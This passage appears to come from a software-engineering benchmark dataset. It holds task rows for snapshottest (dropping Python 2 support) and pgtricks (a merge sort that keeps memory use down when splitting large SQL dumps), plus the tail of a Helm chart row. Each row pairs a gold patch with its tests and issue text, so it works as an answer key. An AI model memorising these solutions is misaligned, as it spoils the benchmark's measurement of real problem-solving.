- digest: 4835bf4b9d3130ad5747052a0eec50f1e5b2ef5133b9084d3a4e5a9f3602cc3e
+ digest: 9789053b0136b06fe3be4e429c1b57d69cc097faac80cdaf21239afa36f650a7
home: https://z2jh.jupyter.org
icon: https://jupyter.org/assets/hublogo.svg
kubeVersion: '>=1.11.0-0'
@@ -2847,8 +2847,8 @@ entries:
- https://github.com/jupyterhub/zero-to-jupyterhub-k8s
tillerVersion: '>=2.11.0-0'
urls:
- - https://jupyterhub.github.io/helm-chart/jupyterhub-0.9.0-alpha.1.tgz
- version: 0.9.0-alpha.1
+ - https://jupyterhub.github.io/helm-chart/jupyterhub-0.9.0-alpha.1+001.g152b8c9.tgz
+ version: 0.9.0-alpha.1+001.g152b8c9
```
|
0.0
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
[
"tests/test_regexp.py::test__strip_identifiers_build_suffix",
"tests/test_regexp.py::test__get_identifier"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_media",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-10-21 08:09:44+00:00
|
bsd-3-clause
| 3,365
|
|
syrusakbary__snapshottest-133
|
diff --git a/.travis.yml b/.travis.yml
index 9494339..578c891 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,8 +1,6 @@
language: python
sudo: false
python:
-- 2.7
-- 3.4
- 3.5
- 3.6
- 3.7
diff --git a/setup.py b/setup.py
index 1229d68..a18b9b0 100644
--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@ from setuptools import setup, find_packages
with open("README.md") as f:
readme = f.read()
-tests_require = ["six", "pytest>=4.6", "pytest-cov", "nose", "django>=1.10.6"]
+tests_require = ["pytest>=4.6", "pytest-cov", "nose", "django>=1.10.6"]
setup(
name="snapshottest",
@@ -23,7 +23,7 @@ setup(
],
"nose.plugins.0.10": ["snapshottest = snapshottest.nose:SnapshotTestPlugin"],
},
- install_requires=["six>=1.10.0", "termcolor", "fastdiff>=0.1.4,<1"],
+ install_requires=["termcolor", "fastdiff>=0.1.4,<1"],
tests_require=tests_require,
extras_require={
"test": tests_require,
@@ -34,21 +34,16 @@ setup(
"nose",
],
},
+ requires_python=">=3.5",
classifiers=[
"Development Status :: 5 - Production/Stable",
+ "Framework :: Django",
"Framework :: Pytest",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
- "Programming Language :: Python",
- "Programming Language :: Python :: 2",
- "Programming Language :: Python :: 2.7",
- "Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.4",
- "Programming Language :: Python :: 3.5",
- "Programming Language :: Python :: 3.6",
- "Programming Language :: Python :: 3.7",
- "Programming Language :: Python :: 3.8",
"Topic :: Software Development :: Libraries",
+ "Topic :: Software Development :: Testing",
+ "Topic :: Software Development :: Testing :: Unit",
],
license="MIT",
packages=find_packages(exclude=("tests",)),
|
syrusakbary/snapshottest
|
9818a7678b3998fcc67634fc86a427d68692c091
|
diff --git a/snapshottest/django.py b/snapshottest/django.py
index 298fd5f..9d20b9c 100644
--- a/snapshottest/django.py
+++ b/snapshottest/django.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
from django.test import TestCase as dTestCase
from django.test import SimpleTestCase as dSimpleTestCase
from django.test.runner import DiscoverRunner
diff --git a/snapshottest/error.py b/snapshottest/error.py
index 5cd1fd7..da0ff8a 100644
--- a/snapshottest/error.py
+++ b/snapshottest/error.py
@@ -1,6 +1,3 @@
-from __future__ import unicode_literals
-
-
class SnapshotError(Exception):
pass
diff --git a/snapshottest/formatters.py b/snapshottest/formatters.py
index 089209f..39a0644 100644
--- a/snapshottest/formatters.py
+++ b/snapshottest/formatters.py
@@ -1,5 +1,4 @@
import math
-import six
from collections import defaultdict
from .sorted_dict import SortedDict
@@ -168,7 +167,7 @@ def default_formatters():
CollectionFormatter(list, format_list),
CollectionFormatter(set, format_set),
CollectionFormatter(frozenset, format_frozenset),
- TypeFormatter(six.string_types, format_str),
+ TypeFormatter((str,), format_str),
TypeFormatter((float,), format_float),
TypeFormatter((int, complex, bool, bytes), format_std_type),
GenericFormatter(),
diff --git a/snapshottest/nose.py b/snapshottest/nose.py
index 371734d..9d0e6b4 100644
--- a/snapshottest/nose.py
+++ b/snapshottest/nose.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
import logging
import os
diff --git a/snapshottest/pytest.py b/snapshottest/pytest.py
index 2d40ca6..5b28898 100644
--- a/snapshottest/pytest.py
+++ b/snapshottest/pytest.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
import pytest
import re
diff --git a/snapshottest/unittest.py b/snapshottest/unittest.py
index b68fce7..535b24a 100644
--- a/snapshottest/unittest.py
+++ b/snapshottest/unittest.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
import unittest
import inspect
diff --git a/tests/test_formatter.py b/tests/test_formatter.py
index 8c53056..2b43f0a 100644
--- a/tests/test_formatter.py
+++ b/tests/test_formatter.py
@@ -1,14 +1,10 @@
# -*- coding: utf-8 -*-
-from __future__ import unicode_literals
-
import pytest
-import six
from math import isnan
from snapshottest.formatter import Formatter
-if not six.PY2:
- import unittest.mock
+import unittest.mock
@pytest.mark.parametrize(
@@ -33,45 +29,33 @@ def test_text_formatting(text_value, expected):
formatted = formatter(text_value)
assert formatted == expected
- if six.PY2:
- # Also check that Python 2 str value formats the same as the unicode value.
- # (If a test case raises UnicodeEncodeError in here, it should be moved to
- # the non_ascii verson of this test, below.)
- py2_str_value = text_value.encode("ASCII")
- py2_str_formatted = formatter(py2_str_value)
- assert py2_str_formatted == expected
-
-# When unicode snapshots are saved in Python 2, there's no easy way to generate
-# a clean unicode_literals repr that doesn't use escape sequences. But the
-# resulting snapshots are still valid on Python 3 (and vice versa).
@pytest.mark.parametrize(
- "text_value, expected_py3, expected_py2",
+ "text_value, expected",
[
- ("encodage précis", "'encodage précis'", "'encodage pr\\xe9cis'"),
- ("精确的编码", "'精确的编码'", "'\\u7cbe\\u786e\\u7684\\u7f16\\u7801'"),
+ ("encodage précis", "'encodage précis'"),
+ ("精确的编码", "'精确的编码'"),
# backslash [unicode repr can't just be `"u'{}'".format(value)`]
- ("omvänt\\snedstreck", "'omvänt\\\\snedstreck'", "'omv\\xe4nt\\\\snedstreck'"),
+ ("omvänt\\snedstreck", "'omvänt\\\\snedstreck'"),
# multiline
- ("ett\ntvå\n", "'''ett\ntvå\n'''", "'''ett\ntv\\xe5\n'''"),
+ ("ett\ntvå\n", "'''ett\ntvå\n'''"),
],
)
-def test_non_ascii_text_formatting(text_value, expected_py3, expected_py2):
- expected = expected_py2 if six.PY2 else expected_py3
+def test_non_ascii_text_formatting(text_value, expected):
formatter = Formatter()
formatted = formatter(text_value)
assert formatted == expected
-if not six.PY2:
- # https://github.com/syrusakbary/snapshottest/issues/115
- def test_can_normalize_unittest_mock_call_object():
- formatter = Formatter()
- print(formatter.normalize(unittest.mock.call(1, 2, 3)))
+# https://github.com/syrusakbary/snapshottest/issues/115
+def test_can_normalize_unittest_mock_call_object():
+ formatter = Formatter()
+ print(formatter.normalize(unittest.mock.call(1, 2, 3)))
+
- def test_can_normalize_iterator_objects():
- formatter = Formatter()
- print(formatter.normalize(x for x in range(3)))
+def test_can_normalize_iterator_objects():
+ formatter = Formatter()
+ print(formatter.normalize(x for x in range(3)))
@pytest.mark.parametrize(
diff --git a/tests/test_module.py b/tests/test_module.py
index cef2207..5ad2758 100644
--- a/tests/test_module.py
+++ b/tests/test_module.py
@@ -1,5 +1,3 @@
-from __future__ import unicode_literals
-
import pytest
from snapshottest import Snapshot
diff --git a/tests/test_snapshot_test.py b/tests/test_snapshot_test.py
index 9249478..9084f87 100644
--- a/tests/test_snapshot_test.py
+++ b/tests/test_snapshot_test.py
@@ -1,5 +1,3 @@
-from __future__ import unicode_literals
-
import pytest
from collections import OrderedDict
diff --git a/tests/test_sorted_dict.py b/tests/test_sorted_dict.py
index b8217d8..41ff194 100644
--- a/tests/test_sorted_dict.py
+++ b/tests/test_sorted_dict.py
@@ -1,5 +1,4 @@
# -*- coding: utf-8 -*-
-from __future__ import unicode_literals
import enum
import pytest
|
Require Python 3
Since Python 2 has been deprecated, I suggest we drop support for it in the next major release. Many libraries, including developer tools, have done so… pip, pytest, etc.
IMO it is not worth spending the limited volunteer development efforts we have to keep this working on an obsolete platform.
|
0.0
|
9818a7678b3998fcc67634fc86a427d68692c091
|
[
"tests/test_snapshot_test.py::test_snapshot_matches_itself[{'a',"
] |
[
"tests/test_formatter.py::test_text_formatting[abc-'abc']",
"tests/test_formatter.py::test_text_formatting[-'']",
"tests/test_formatter.py::test_text_formatting[back\\\\slash-'back\\\\\\\\slash']",
"tests/test_formatter.py::test_text_formatting[it",
"tests/test_formatter.py::test_text_formatting[it's",
"tests/test_formatter.py::test_text_formatting[one\\ntwo\\n-'''one\\ntwo\\n''']",
"tests/test_formatter.py::test_text_formatting[three\\n'''quotes-\"\"\"three\\n'''quotes\"\"\"]",
"tests/test_formatter.py::test_text_formatting[so",
"tests/test_formatter.py::test_non_ascii_text_formatting[encodage",
"tests/test_formatter.py::test_non_ascii_text_formatting[\\u7cbe\\u786e\\u7684\\u7f16\\u7801-'\\u7cbe\\u786e\\u7684\\u7f16\\u7801']",
"tests/test_formatter.py::test_non_ascii_text_formatting[omv\\xe4nt\\\\snedstreck-'omv\\xe4nt\\\\\\\\snedstreck']",
"tests/test_formatter.py::test_non_ascii_text_formatting[ett\\ntv\\xe5\\n-'''ett\\ntv\\xe5\\n''']",
"tests/test_formatter.py::test_can_normalize_unittest_mock_call_object",
"tests/test_formatter.py::test_can_normalize_iterator_objects",
"tests/test_formatter.py::test_basic_formatting_parsing[0]",
"tests/test_formatter.py::test_basic_formatting_parsing[12.7]",
"tests/test_formatter.py::test_basic_formatting_parsing[True]",
"tests/test_formatter.py::test_basic_formatting_parsing[False]",
"tests/test_formatter.py::test_basic_formatting_parsing[None]",
"tests/test_formatter.py::test_basic_formatting_parsing[-inf]",
"tests/test_formatter.py::test_basic_formatting_parsing[inf]",
"tests/test_formatter.py::test_formatting_parsing_nan",
"tests/test_module.py::TestSnapshotModuleLoading::test_load_not_yet_saved",
"tests/test_module.py::TestSnapshotModuleLoading::test_load_missing_package",
"tests/test_module.py::TestSnapshotModuleLoading::test_load_corrupted_snapshot",
"tests/test_snapshot_test.py::test_snapshot_matches_itself['abc']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[b'abc']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[123]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[123.456]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[{'a':",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[['a',",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[('a',",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[('a',)]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[None]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[False]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself['']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[b'']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[{}]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[[]]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[set()]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[()]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[0]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[0.0]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[OrderedDict([('a',",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[OrderedDict([('c',",
"tests/test_snapshot_test.py::test_snapshot_does_not_match_other_values[snapshot",
"tests/test_sorted_dict.py::test_sorted_dict[key1-value]",
"tests/test_sorted_dict.py::test_sorted_dict[key2-42]",
"tests/test_sorted_dict.py::test_sorted_dict[key3-value2]",
"tests/test_sorted_dict.py::test_sorted_dict[key4-value3]",
"tests/test_sorted_dict.py::test_sorted_dict[key5-value4]",
"tests/test_sorted_dict.py::test_sorted_dict[key6-value5]",
"tests/test_sorted_dict.py::test_sorted_dict[key7-value6]",
"tests/test_sorted_dict.py::test_sorted_dict[key8-value7]",
"tests/test_sorted_dict.py::test_sorted_dict_string_key",
"tests/test_sorted_dict.py::test_sorted_dict_int_key",
"tests/test_sorted_dict.py::test_sorted_dict_intenum",
"tests/test_sorted_dict.py::test_sorted_dict_enum",
"tests/test_sorted_dict.py::test_sorted_dict_enum_value",
"tests/test_sorted_dict.py::test_sorted_dict_enum_key"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-09-29 23:35:10+00:00
|
mit
| 5,822
|
|
akaihola__pgtricks-13
|
diff --git a/CHANGES.rst b/CHANGES.rst
index 3fc8314..c3796a7 100644
--- a/CHANGES.rst
+++ b/CHANGES.rst
@@ -13,6 +13,9 @@ Removed
Fixed
-----
+- Very large tables are now sorted without crashing. This is done by merge sorting
+ in temporary files.
+
1.0.0_ / 2021-09-11
====================
diff --git a/mypy.ini b/mypy.ini
index ed30dab..bbb2f00 100644
--- a/mypy.ini
+++ b/mypy.ini
@@ -32,6 +32,9 @@ strict_equality = True
disallow_any_decorated = False
disallow_untyped_defs = False
+[mypy-pgtricks.mergesort]
+disallow_any_explicit = False
+
[mypy-pytest.*]
ignore_missing_imports = True
diff --git a/pgtricks/mergesort.py b/pgtricks/mergesort.py
new file mode 100644
index 0000000..f22f020
--- /dev/null
+++ b/pgtricks/mergesort.py
@@ -0,0 +1,76 @@
+"""Merge sort implementation to handle large files by sorting them in partitions."""
+
+from __future__ import annotations
+
+import sys
+from heapq import merge
+from tempfile import TemporaryFile
+from typing import IO, Any, Callable, Iterable, Iterator, cast
+
+
+class MergeSort(Iterable[str]):
+ """Merge sort implementation to handle large files by sorting them in partitions."""
+
+ def __init__(
+ self,
+ key: Callable[[str], Any] = str,
+ directory: str = ".",
+ max_memory: int = 190,
+ ) -> None:
+ """Initialize the merge sort object."""
+ self._key = key
+ self._directory = directory
+ self._max_memory = max_memory
+ # Use binary mode to avoid newline conversion on Windows.
+ self._partitions: list[IO[bytes]] = []
+ self._iterating: Iterable[str] | None = None
+ self._buffer: list[str] = []
+ self._memory_counter: int = sys.getsizeof(self._buffer)
+ self._flush()
+
+ def append(self, line: str) -> None:
+ """Append a line to the set of lines to be sorted."""
+ if self._iterating:
+ message = "Can't append lines after starting to sort"
+ raise ValueError(message)
+ self._memory_counter -= sys.getsizeof(self._buffer)
+ self._buffer.append(line)
+ self._memory_counter += sys.getsizeof(self._buffer)
+ self._memory_counter += sys.getsizeof(line)
+ if self._memory_counter >= self._max_memory:
+ self._flush()
+
+ def _flush(self) -> None:
+ if self._buffer:
+ # Use binary mode to avoid newline conversion on Windows.
+ self._partitions.append(TemporaryFile(mode="w+b", dir=self._directory))
+ self._partitions[-1].writelines(
+ line.encode("UTF-8") for line in sorted(self._buffer, key=self._key)
+ )
+ self._buffer = []
+ self._memory_counter = sys.getsizeof(self._buffer)
+
+ def __next__(self) -> str:
+ """Return the next line in the sorted list of lines."""
+ if not self._iterating:
+ if self._partitions:
+ # At least one partition has already been flushed to disk.
+ # Iterate the merge sort for all partitions.
+ self._flush()
+ for partition in self._partitions:
+ partition.seek(0)
+ self._iterating = merge(
+ *[
+ (line.decode("UTF-8") for line in partition)
+ for partition in self._partitions
+ ],
+ key=self._key,
+ )
+ else:
+ # All lines fit in memory. Iterate the list of lines directly.
+ self._iterating = iter(sorted(self._buffer, key=self._key))
+ return next(cast(Iterator[str], self._iterating))
+
+ def __iter__(self) -> Iterator[str]:
+ """Return the iterator object for the sorted list of lines."""
+ return self
diff --git a/pgtricks/pg_dump_splitsort.py b/pgtricks/pg_dump_splitsort.py
index 56908ea..aab1258 100755
--- a/pgtricks/pg_dump_splitsort.py
+++ b/pgtricks/pg_dump_splitsort.py
@@ -1,15 +1,23 @@
#!/usr/bin/env python
+from __future__ import annotations
+
import functools
+import io
import os
import re
-import sys
-from typing import IO, List, Match, Optional, Pattern, Tuple, Union, cast
+from argparse import ArgumentParser
+from typing import IO, Iterable, Match, Pattern, cast
+
+from pgtricks.mergesort import MergeSort
COPY_RE = re.compile(r'COPY .*? \(.*?\) FROM stdin;\n$')
+KIBIBYTE, MEBIBYTE, GIBIBYTE = 2**10, 2**20, 2**30
+MEMORY_UNITS = {"": 1, "k": KIBIBYTE, "m": MEBIBYTE, "g": GIBIBYTE}
-def try_float(s1: str, s2: str) -> Union[Tuple[str, str], Tuple[float, float]]:
+def try_float(s1: str, s2: str) -> tuple[str, str] | tuple[float, float]:
+ """Convert two strings to floats. Return original ones on conversion error."""
if not s1 or not s2 or s1[0] not in '0123456789.-' or s2[0] not in '0123456789.-':
# optimization
return s1, s2
@@ -22,7 +30,8 @@ def try_float(s1: str, s2: str) -> Union[Tuple[str, str], Tuple[float, float]]:
def linecomp(l1: str, l2: str) -> int:
p1 = l1.split('\t', 1)
p2 = l2.split('\t', 1)
- v1, v2 = cast(Tuple[float, float], try_float(p1[0], p2[0]))
+ # TODO: unquote cast after support for Python 3.8 is dropped
+ v1, v2 = cast("tuple[float, float]", try_float(p1[0], p2[0]))
result = (v1 > v2) - (v1 < v2)
# modifying a line to see whether Darker works:
if not result and len(p1) == len(p2) == 2:
@@ -37,9 +46,10 @@ SEQUENCE_SET_RE = re.compile(r'-- Name: .+; Type: SEQUENCE SET; Schema: |'
class Matcher(object):
def __init__(self) -> None:
- self._match: Optional[Match[str]] = None
+ self._match: Match[str] | None = None
- def match(self, pattern: Pattern[str], data: str) -> Optional[Match[str]]:
+ def match(self, pattern: Pattern[str], data: str) -> Match[str] | None:
+ """Match the regular expression pattern against the data."""
self._match = pattern.match(data)
return self._match
@@ -49,34 +59,44 @@ class Matcher(object):
return self._match.group(group1)
-def split_sql_file(sql_filepath: str) -> None:
-
+def split_sql_file( # noqa: C901 too complex
+ sql_filepath: str,
+ max_memory: int = 100 * MEBIBYTE,
+) -> None:
+ """Split a SQL file so that each COPY statement is in its own file."""
directory = os.path.dirname(sql_filepath)
- output: Optional[IO[str]] = None
- buf: List[str] = []
+ # `output` needs to be instantiated before the inner functions are defined.
+ # Assign it a dummy string I/O object so type checking is happy.
+ # This will be replaced with the prologue SQL file object.
+ output: IO[str] = io.StringIO()
+ buf: list[str] = []
def flush() -> None:
- cast(IO[str], output).writelines(buf)
+ output.writelines(buf)
buf[:] = []
+ def writelines(lines: Iterable[str]) -> None:
+ if buf:
+ flush()
+ output.writelines(lines)
+
def new_output(filename: str) -> IO[str]:
if output:
output.close()
return open(os.path.join(directory, filename), 'w')
- copy_lines: Optional[List[str]] = None
+ sorted_data_lines: MergeSort | None = None
counter = 0
output = new_output('0000_prologue.sql')
matcher = Matcher()
for line in open(sql_filepath):
- if copy_lines is None:
+ if sorted_data_lines is None:
if line in ('\n', '--\n'):
buf.append(line)
elif line.startswith('SET search_path = '):
- flush()
- buf.append(line)
+ writelines([line])
else:
if matcher.match(DATA_COMMENT_RE, line):
counter += 1
@@ -86,28 +106,54 @@ def split_sql_file(sql_filepath: str) -> None:
schema=matcher.group('schema'),
table=matcher.group('table')))
elif COPY_RE.match(line):
- copy_lines = []
+ sorted_data_lines = MergeSort(
+ key=functools.cmp_to_key(linecomp),
+ max_memory=max_memory,
+ )
elif SEQUENCE_SET_RE.match(line):
pass
elif 1 <= counter < 9999:
counter = 9999
output = new_output('%04d_epilogue.sql' % counter)
- buf.append(line)
- flush()
+ writelines([line])
else:
- if line == '\\.\n':
- copy_lines.sort(key=functools.cmp_to_key(linecomp))
- buf.extend(copy_lines)
- buf.append(line)
- flush()
- copy_lines = None
+ if line == "\\.\n":
+ writelines(sorted_data_lines)
+ writelines(line)
+ sorted_data_lines = None
else:
- copy_lines.append(line)
+ sorted_data_lines.append(line)
flush()
+def memory_size(size: str) -> int:
+ """Parse a human-readable memory size.
+
+ :param size: The memory size to parse, e.g. "100MB".
+ :return: The memory size in bytes.
+ :raise ValueError: If the memory size is invalid.
+
+ """
+ match = re.match(r"([\d._]+)\s*([kmg]?)b?", size.lower().strip())
+ if not match:
+ message = f"Invalid memory size: {size}"
+ raise ValueError(message)
+ return int(float(match.group(1)) * MEMORY_UNITS[match.group(2)])
+
+
def main() -> None:
- split_sql_file(sys.argv[1])
+ parser = ArgumentParser(description="Split a SQL file into smaller files.")
+ parser.add_argument("sql_filepath", help="The SQL file to split.")
+ parser.add_argument(
+ "-m",
+ "--max-memory",
+ default=100 * MEBIBYTE,
+ type=memory_size,
+ help="Max memory to use, e.g. 50_000, 200000000, 100kb, 100MB (default), 2Gig.",
+ )
+ args = parser.parse_args()
+
+ split_sql_file(args.sql_filepath, args.max_memory)
if __name__ == '__main__':
diff --git a/pyproject.toml b/pyproject.toml
index 086fffd..6f3739b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -21,7 +21,9 @@ ignore = [
"ANN201", # Missing return type annotation for public function
#"ANN204", # Missing return type annotation for special method `__init__`
#"C408", # Unnecessary `dict` call (rewrite as a literal)
+ "PLR2004", # Magic value used in comparison
"S101", # Use of `assert` detected
+ "SLF001", # Private member accessed
]
[tool.ruff.lint.isort]
|
akaihola/pgtricks
|
c5ba05b4db22a74388b0c2b863e1c4a9f0467c8b
|
diff --git a/pgtricks/tests/test_mergesort.py b/pgtricks/tests/test_mergesort.py
new file mode 100644
index 0000000..6f7c0b6
--- /dev/null
+++ b/pgtricks/tests/test_mergesort.py
@@ -0,0 +1,110 @@
+"""Tests for the `pgtricks.mergesort` module."""
+
+import functools
+from types import GeneratorType
+from typing import Iterable, cast
+
+import pytest
+
+from pgtricks.mergesort import MergeSort
+from pgtricks.pg_dump_splitsort import linecomp
+
+# This is the biggest amount of memory which can't hold two one-character lines on any
+# platform. On Windows it's slightly smaller than on Unix.
+JUST_BELOW_TWO_SHORT_LINES = 174
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_append(tmpdir, lf):
+ """Test appending lines to the merge sort object."""
+ m = MergeSort(directory=tmpdir, max_memory=JUST_BELOW_TWO_SHORT_LINES)
+ m.append(f"1{lf}")
+ assert m._buffer == [f"1{lf}"]
+ m.append(f"2{lf}")
+ assert m._buffer == []
+ m.append(f"3{lf}")
+ assert m._buffer == [f"3{lf}"]
+ assert len(m._partitions) == 1
+ pos = m._partitions[0].tell()
+ m._partitions[0].seek(0)
+ assert m._partitions[0].read() == f"1{lf}2{lf}".encode()
+ assert pos == len(f"1{lf}2{lf}")
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_flush(tmpdir, lf):
+ """Test flushing the buffer to disk."""
+ m = MergeSort(directory=tmpdir, max_memory=JUST_BELOW_TWO_SHORT_LINES)
+ for value in [1, 2, 3]:
+ m.append(f"{value}{lf}")
+ m._flush()
+ assert len(m._partitions) == 2
+ assert m._partitions[0].tell() == len(f"1{lf}2{lf}")
+ m._partitions[0].seek(0)
+ assert m._partitions[0].read() == f"1{lf}2{lf}".encode()
+ pos = m._partitions[1].tell()
+ m._partitions[1].seek(0)
+ assert m._partitions[1].read() == f"3{lf}".encode()
+ assert pos == len(f"3{lf}")
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_iterate_disk(tmpdir, lf):
+ """Test iterating over the sorted lines on disk."""
+ m = MergeSort(directory=tmpdir, max_memory=JUST_BELOW_TWO_SHORT_LINES)
+ for value in [3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 8, 4]:
+ m.append(f"{value}{lf}")
+ assert next(m) == f"1{lf}"
+ assert isinstance(m._iterating, GeneratorType)
+ assert next(m) == f"1{lf}"
+ assert next(m) == f"2{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"6{lf}"
+ assert next(m) == f"8{lf}"
+ assert next(m) == f"9{lf}"
+ with pytest.raises(StopIteration):
+ next(m)
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_iterate_memory(tmpdir, lf):
+ """Test iterating over the sorted lines when all lines fit in memory."""
+ m = MergeSort(
+ directory=tmpdir,
+ max_memory=1000000,
+ key=functools.cmp_to_key(linecomp),
+ )
+ for value in [3, 1, 4, 1, 5, 9, 2, 10, 6, 5, 3, 8, 4]:
+ m.append(f"{value}{lf}")
+ assert next(m) == f"1{lf}"
+ assert not isinstance(m._iterating, GeneratorType)
+ assert iter(cast(Iterable[str], m._iterating)) is m._iterating
+ assert next(m) == f"1{lf}"
+ assert next(m) == f"2{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"6{lf}"
+ assert next(m) == f"8{lf}"
+ assert next(m) == f"9{lf}"
+ assert next(m) == f"10{lf}"
+ with pytest.raises(StopIteration):
+ next(m)
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_key(tmpdir, lf):
+ """Test sorting lines based on a key function."""
+ m = MergeSort(directory=tmpdir, key=lambda line: -int(line[0]))
+ for value in [3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 8, 4]:
+ m.append(f"{value}{lf}")
+ result = "".join(value[0] for value in m)
+ assert result == "986554433211"
diff --git a/pgtricks/tests/test_pg_dump_splitsort.py b/pgtricks/tests/test_pg_dump_splitsort.py
index 3305c03..74e6b56 100644
--- a/pgtricks/tests/test_pg_dump_splitsort.py
+++ b/pgtricks/tests/test_pg_dump_splitsort.py
@@ -1,8 +1,9 @@
from functools import cmp_to_key
+from textwrap import dedent
import pytest
-from pgtricks.pg_dump_splitsort import linecomp, try_float
+from pgtricks.pg_dump_splitsort import linecomp, memory_size, split_sql_file, try_float
@pytest.mark.parametrize(
@@ -101,3 +102,111 @@ def test_linecomp_by_sorting():
[r'\N', r'\N', r'\N'],
[r'\N', 'foo', '.42'],
]
+
+
+PROLOGUE = dedent(
+ """
+
+ --
+ -- Name: table1; Type: TABLE; Schema: public; Owner:
+ --
+
+ (information for table1 goes here)
+ """,
+)
+
+TABLE1_COPY = dedent(
+ r"""
+
+ -- Data for Name: table1; Type: TABLE DATA; Schema: public;
+
+ COPY foo (id) FROM stdin;
+ 3
+ 1
+ 4
+ 1
+ 5
+ 9
+ 2
+ 6
+ 5
+ 3
+ 8
+ 4
+ \.
+ """,
+)
+
+TABLE1_COPY_SORTED = dedent(
+ r"""
+
+ -- Data for Name: table1; Type: TABLE DATA; Schema: public;
+
+ COPY foo (id) FROM stdin;
+ 1
+ 1
+ 2
+ 3
+ 3
+ 4
+ 4
+ 5
+ 5
+ 6
+ 8
+ 9
+ \.
+ """,
+)
+
+EPILOGUE = dedent(
+ """
+ -- epilogue
+ """,
+)
+
+
+def test_split_sql_file(tmpdir):
+ """Test splitting a SQL file with COPY statements."""
+ sql_file = tmpdir / "test.sql"
+ sql_file.write(PROLOGUE + TABLE1_COPY + EPILOGUE)
+
+ split_sql_file(sql_file, max_memory=190)
+
+ split_files = sorted(path.relto(tmpdir) for path in tmpdir.listdir())
+ assert split_files == [
+ "0000_prologue.sql",
+ "0001_public.table1.sql",
+ "9999_epilogue.sql",
+ "test.sql",
+ ]
+ assert (tmpdir / "0000_prologue.sql").read() == PROLOGUE
+ assert (tmpdir / "0001_public.table1.sql").read() == TABLE1_COPY_SORTED
+ assert (tmpdir / "9999_epilogue.sql").read() == EPILOGUE
+
+
+@pytest.mark.parametrize(
+ ("size", "expect"),
+ [
+ ("0", 0),
+ ("1", 1),
+ ("1k", 1024),
+ ("1m", 1024**2),
+ ("1g", 1024**3),
+ ("100_000K", 102400000),
+ ("1.5M", 1536 * 1024),
+ ("1.5G", 1536 * 1024**2),
+ ("1.5", 1),
+ ("1.5 kibibytes", 1536),
+ ("1.5 Megabytes", 1024 * 1536),
+ ("1.5 Gigs", 1024**2 * 1536),
+ ("1.5KB", 1536),
+ (".5MB", 512 * 1024),
+ ("20GB", 20 * 1024**3),
+ ],
+)
+def test_memory_size(size, expect):
+ """Test parsing human-readable memory sizes with `memory_size`."""
+ result = memory_size(size)
+
+ assert result == expect
|
Use Too Much Memory, Killed by System
I'm using this project to split the .sql file so that the pg_dump output ends up in an order that lets backup programs deduplicate the existing data.
The dumped file is more than 1000GB, which is fairly big, so I suspect the data is being sorted entirely in memory and that is why memory runs out.
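
The patch above addresses this by adding `pgtricks/mergesort.py`, which spills sorted partitions to temporary files and merges them lazily. As a minimal hedged sketch of that general technique (an illustration only, not the project's code; the chunk-size threshold and newline-terminated input lines are assumptions made for this example):

```python
import heapq
import tempfile


def external_sort(lines, max_lines_in_memory=100_000):
    """Yield newline-terminated `lines` in sorted order without holding them all in memory."""
    partitions = []  # one open temp file per sorted, spilled chunk
    buffer = []
    for line in lines:
        buffer.append(line)
        if len(buffer) >= max_lines_in_memory:
            partitions.append(_spill(sorted(buffer)))
            buffer = []
    if not partitions:
        # Everything fit in memory: sort and stream directly.
        yield from sorted(buffer)
        return
    if buffer:
        partitions.append(_spill(sorted(buffer)))
    # k-way merge of the already-sorted partitions, one line at a time.
    yield from heapq.merge(*partitions)


def _spill(sorted_lines):
    """Write one sorted chunk to a temporary file and return it rewound for iteration."""
    tmp = tempfile.TemporaryFile(mode="w+")
    tmp.writelines(sorted_lines)
    tmp.seek(0)
    return tmp  # text file objects iterate line by line
```

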